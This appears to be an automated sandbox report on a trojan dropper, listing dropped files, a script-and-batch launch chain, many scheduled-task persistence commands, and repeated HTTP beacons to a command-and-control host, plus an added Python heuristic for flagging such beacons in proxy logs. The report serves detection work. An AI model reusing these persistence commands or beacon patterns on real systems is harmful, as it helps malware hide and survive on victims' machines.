Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\db8cdfc8abc352
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\Idle.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\6ccacd8608530f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\upfc.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Portable Devices\ea1d8f6d871115
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\Windows Mail\db8cdfc8abc352
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Directory created: C:\Program Files\MSBuild\db8cdfc8abc352
Source: rWjaZEKha8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: rWjaZEKha8.exe
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0018B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: Joe Sandbox View | IP Address: 141.8.197.42
Source: global traffic | HTTP traffic detected:
    GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1067345.xsph.ru
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1067345.xsph.ru
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1067345.xsph.ru
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: a1067345.xsph.ru
Source: global traffic | DNS traffic detected: DNS query: a1067345.xsph.ru
Source: Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a1067345.xsph.ru
Source: Idle.exe, 00000015.00000002.1857787065.00000000027A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a1067345.xsph.ru/
Source: Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e
Source: intoDhcp.exe, 00000004.00000002.1750999526.0000000003644000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
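The beacon above is a GET to a .php endpoint that sends a Content-Type header although a GET carries no body, repeats two query parameters verbatim, and uses 32-character hexadecimal parameter names behind a stock browser User-Agent. The scorer below is an added example, not part of the report, that turns those observations into a proxy-log heuristic. The request records it runs over are constructed for the example: the first reproduces the traffic shown above, the second is a benign control, and the indicator host set holds only the domain from this report.

```python
"""Heuristic scoring of the HTTP beacon shape seen above (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Host taken from this report; a real deployment would load a feed.
IOC_HOSTS = {"a1067345.xsph.ru"}
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed request records: the first reproduces the GET shown above,
# the second is a benign control. A proxy log parser would feed these in.
REQUESTS = [
    {
        "method": "GET",
        "url": "http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq"
               "&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ"
               "&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e"
               "&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO"
               "&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ",
        "headers": {
            "Accept": "*/*",
            "Content-Type": "text/csv",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
            "Host": "a1067345.xsph.ru",
        },
    },
    {
        "method": "GET",
        "url": "https://www.example.org/search?q=scheduled+tasks&page=2",
        "headers": {
            "Accept": "text/html",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
            "Host": "www.example.org",
        },
    },
]


def score_request(req):
    """Return the list of reasons a request resembles the beacon above."""
    reasons = []
    url = urlsplit(req["url"])
    headers = {k.lower(): v for k, v in req["headers"].items()}
    params = parse_qsl(url.query, keep_blank_values=True)
    names = [n for n, _ in params]

    if url.hostname in IOC_HOSTS:
        reasons.append("host %s is a known indicator" % url.hostname)
    if req["method"].upper() == "GET" and "content-type" in headers:
        # A GET carries no body, so a Content-Type header is a client quirk
        # worth keying on; browsers do not send it on navigation requests.
        reasons.append("GET declares Content-Type %r" % headers["content-type"])
    hex_names = [n for n in names if HEX32.match(n)]
    if hex_names:
        reasons.append("%d parameter name(s) are 32-char hex digests" % len(hex_names))
    repeated = sorted(n for n in set(names) if names.count(n) > 1)
    if repeated:
        reasons.append("parameters repeated verbatim: %s" % ", ".join(repeated))
    return reasons


if __name__ == "__main__":
    for req in REQUESTS:
        print(req["url"][:60], score_request(req) or "no findings")
```

The host match is the only reason tied to this sample; the other three describe the request shape and will keep matching once the operator moves to a new domain, which is why they are worth keeping separate rather than folded into one score.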

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017857B
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0019D00E
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017407E
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_001870BF
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_001A1194
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00173281
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017E2A0
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_001902F6
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00186646
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0019070E
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0019473A
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_001837C1
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_001727E8
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017E8A0
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00194969
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017F968
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00183A3C
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00186A7B
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00190B43
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0019CB60
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00185C77
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017ED14
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00183D6D
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0018FDFA
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017BE13
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_0017DE6C
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00175F3C
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: 0_2_00190F78
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Code function: 4_2_00007FFD9BA03655
Source: C:\Program Files\Windows Portable Devices\Idle.exe | Code function: 18_2_00007FFD9B9E3655
Source: C:\Program Files\Windows Portable Devices\Idle.exe | Code function: 21_2_00007FFD9BA13655
Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Code function: 23_2_00007FFD9BA03655
Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | Code function: 26_2_00007FFD9BA13655
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: String function: 0018E360 appears 52 times
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: String function: 0018ED00 appears 31 times
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Code function: String function: 0018E28C appears 35 times
Source: intoDhcp.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OjTEkrTlLyhdt.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dasHost.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rWjaZEKha8.exe, 00000000.00000003.1657120540.0000000006BC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename libGLESv2.dll vs rWjaZEKha8.exe
Source: rWjaZEKha8.exe, 00000000.00000003.1656716234.0000000006BCD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename libGLESv2.dll vs rWjaZEKha8.exe
Source: rWjaZEKha8.exe, 00000000.00000003.1656117099.00000000062CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename libGLESv2.dll vs rWjaZEKha8.exe
Source: rWjaZEKha8.exe | Binary or memory string: OriginalFilename libGLESv2.dll vs rWjaZEKha8.exe
Source: rWjaZEKha8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@51/28@1/1
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00176EC9 GetLastError,FormatMessageW,0_2_00176EC9
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00189E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00189E1C
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3f8e52fc26604f37f7b216339b61e4b634e6416b
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\AppData\Local\Temp\ILJWfEtwdoJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: sfxname0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: sfxstime0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: STARTDLG0_2_0018D5D4
            Source: rWjaZEKha8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: rWjaZEKha8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (33 identical calls; the same number as the schtasks.exe launches attributed to intoDhcp.exe in the process list below)
Source: C:\Program Files\Windows Portable Devices\Idle.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rWjaZEKha8.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | File read: C:\Users\user\Desktop\rWjaZEKha8.exe
Source: unknown | Process created: C:\Users\user\Desktop\rWjaZEKha8.exe "C:\Users\user\Desktop\rWjaZEKha8.exe"
Source: C:\Users\user\Desktop\rWjaZEKha8.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\bridgehyperperfdhcp\intoDhcp.exe "C:\bridgehyperperfdhcp\intoDhcp.exe"
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
Source: unknown | Process created: C:\Program Files\Windows Portable Devices\Idle.exe "C:\Program Files\Windows Portable Devices\Idle.exe"
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Program Files\Windows Portable Devices\Idle.exe "C:\Program Files\Windows Portable Devices\Idle.exe"
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f
Source: unknown | Process created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
